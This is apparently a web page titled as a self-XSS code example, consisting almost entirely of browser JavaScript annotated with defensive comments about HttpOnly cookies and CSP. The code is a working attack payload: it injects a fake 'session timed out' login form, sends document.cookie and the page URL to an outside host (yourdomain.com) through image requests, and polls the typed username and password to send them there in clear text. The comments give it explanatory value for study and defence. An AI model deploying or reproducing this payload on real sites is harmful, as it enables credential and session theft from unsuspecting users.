
self-xss code example

// This listing is browser JavaScript. It illustrates what a script can do once it
// executes inside a page's origin: add a look-alike login form to the DOM and send
// cookie and form values to another host through image requests.
// Defensive context: cookies flagged HttpOnly are not readable through document.cookie,
// and a Content-Security-Policy (script-src, img-src) limits both where script may
// come from and where image requests may go.

// Written when the field values are sent; never read anywhere in this listing.
var done = false;
// Set once the field values have been sent; the poller checks it before re-arming.
var stolen = false;
 
/**
 * After a 2000 ms delay, appends a hidden anchor and a hidden "loginmodal" form to
 * document.body (only if no element with that id exists yet), then requests an image
 * URL that carries document.cookie and the current page URL in its query string.
 *
 * What a defender can observe: a DOM mutation adding a form with id "loginform" that
 * the application never rendered, followed by a cross-origin GET whose query string
 * contains "checkin=true" and "cookies=".
 */
function makeit(){
    setTimeout(function(){
        var myElem = document.getElementById("loginmodal");
        // Guard so the markup is injected at most once.
        if (myElem === null){
            // The form text claims the session timed out. Both the anchor and the wrapper div
            // are inserted with display:none; nothing in this listing makes them visible.
            document.body.innerHTML += '<a style="display:none" >Modal Login</a><div id="loginmodal" style="display:none;"><h1>User Login</h1>' +
                                       '<form id="loginform" name="loginform" method="post"><h2 style="color:red">Your session has timed out, ' +
                                       'please re-enter your credentials</h2><label for="username">Username:</label><input type="text" ' +
                                       'name="username" id="username" class="txtfield" tabindex="1"><label for="password">Password:</label>' +
                                       '<input type="password" name="password" id="password" class="txtfield" tabindex="2"><div class="center">' +
                                       '<input type="submit" name="loginbtn" id="loginbtn" class="flatbtn-blu hidemodal" value="Log In" tabindex="3">' +
                                       '</div></form></div>';
            // No var/let/const here, so XSSImage is an implicit global.
            XSSImage = new Image;
            // Assigning src triggers a GET request; no image is ever displayed. Only cookies
            // without the HttpOnly flag appear in document.cookie. A CSP img-src allow-list
            // that omits this host would block the request.
            XSSImage.src="https://yourdomain.com/log?checkin=true&cookies=" + encodeURIComponent(document.cookie) + "&url=" + window.location.href;
        }
    }, 2000);
}

// Runs as soon as the script is evaluated; the DOM change itself happens 2000 ms later.
makeit();
 
/**
 * Polls every 50 ms until an element with id "loginmodal" exists, then calls
 * `method` once with no arguments. Its return value is ignored.
 *
 * @param {Function} method - callback to run once the element is present.
 */
function defer_again(method) {
    var myElem = document.getElementById("loginmodal");
    if (myElem === null)
        // Element not in the DOM yet: check again in 50 ms.
        setTimeout(function() { defer_again(method) }, 50);
    else{
        method();
    }
}
 
// Starts polling the injected form as soon as "loginmodal" exists in the DOM.
// The callback reads the username and password inputs every 50 ms instead of
// listening for a submit event, so values are read while the user is still typing.
// What a defender can observe: a cross-origin GET whose query string contains
// "username=" and "password=" in clear text, visible in proxy or egress logs.
defer_again(
    function trig(){
        var uname = document.getElementById('username').value;
        var pwd = document.getElementById('password').value;
        // Both values must be longer than 4 characters before anything is sent.
        if (uname.length > 4 && pwd.length > 4)
        {
            done = true;
            //alert("Had this been a real attack... Your credentials were just stolen. User Name = " + uname + "  Password = " + pwd);
            // Implicit global again (no declaration keyword). Setting src issues the GET;
            // a CSP img-src allow-list that omits this host would block it.
            XSSImage = new Image;
            XSSImage.src="https://yourdomain.com/log?username=" + encodeURIComponent(uname) + "&password=" + encodeURIComponent(pwd) + 
                         "&url=" + window.location.href;
            stolen = true;
            // Neither caller in this listing uses the return value.
            return false;
        }

        // Nothing sent yet: move focus to the username field and check again in 50 ms.
        if(!stolen){
            document.getElementById('username').focus();
            setTimeout(function() { trig() }, 50);
        }
    }
);

self-xss meaning

SCARYYY
